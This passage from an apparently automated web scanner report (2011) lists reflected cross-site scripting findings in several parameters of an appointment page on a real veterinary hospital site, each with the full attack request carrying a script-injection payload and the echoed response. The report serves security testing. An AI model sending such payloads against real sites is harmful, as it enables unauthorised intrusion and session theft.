time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:48:02 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=mc85tfs8n4tb3ncs6vao1tc4e7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23515 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital321c7"><script>alert(1)</script>32eff3265ff &submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26am...[SNIP]...
2.114. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [submit parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 287cc"><script>alert(1)</script>5f92cd18c67 was submitted in the submit parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment287cc"><script>alert(1)</script>5f92cd18c67 &time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:48:06 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=3dmerjf0pu4ur5m108fr6u0eo4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23515 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... e2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment287cc"><script>alert(1)</script>5f92cd18c67 &time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_t...[SNIP]...
2.115. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time1 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the time1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c314"><script>alert(1)</script>8b54768be74 was submitted in the time1 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=1c314"><script>alert(1)</script>8b54768be74 &time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:48:11 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=va0mcsa20967inl4q6o12l7ce1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23558 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="time1" id="time1" type="text" size="15" maxlength="50" value="1c314"><script>alert(1)</script>8b54768be74 " />...[SNIP]...
2.116. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time2 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the time2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36704"><script>alert(1)</script>8897a2f5b0 was submitted in the time2 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=36704"><script>alert(1)</script>8897a2f5b0 &time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%
253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:48:15 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=3pljhhs657854au6aumnm7vhq1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23556 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="time2" id="time2" type="text" size="15" maxlength="50" value="36704"><script>alert(1)</script>8897a2f5b0 " />...[SNIP]...
2.117. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time3 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the time3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbc15"><script>alert(1)</script>a12a15661f1 was submitted in the time3 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=fbc15"><script>alert(1)</script>a12a15661f1 &token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:48:19 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=9nroe6rd3or4ki6oso4miqpib1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23558 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="time3" id="time3" type="text" size="15" maxlength="50" value="fbc15"><script>alert(1)</script>a12a15661f1 " />...[SNIP]...
2.118. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [token parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c98f"><script>alert(1)</script>1c63589670 was submitted in the token parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d7c98f"><script>alert(1)</script>1c63589670 &uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%
253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:48:24 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=r71o8vgd1ptoa4ae288u3u1u00; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23514 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... .243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d7c98f"><script>alert(1)</script>1c63589670 &uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%...[SNIP]...
2.119. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [uri parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c08"><script>alert(1)</script>fa2f4234571 was submitted in the uri parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)64c08"><script
>alert(1)</script>fa2f4234571 &useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:48:28 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=42ioijmo61q4lhnolf0g547n70; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23515 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... dows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)64c08"><script>alert(1)</script>fa2f4234571 &useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)" />...[SNIP]...
2.120. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [useragent parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the useragent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc9a7"><script>alert(1)</script>a58880500cd was submitted in the useragent parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
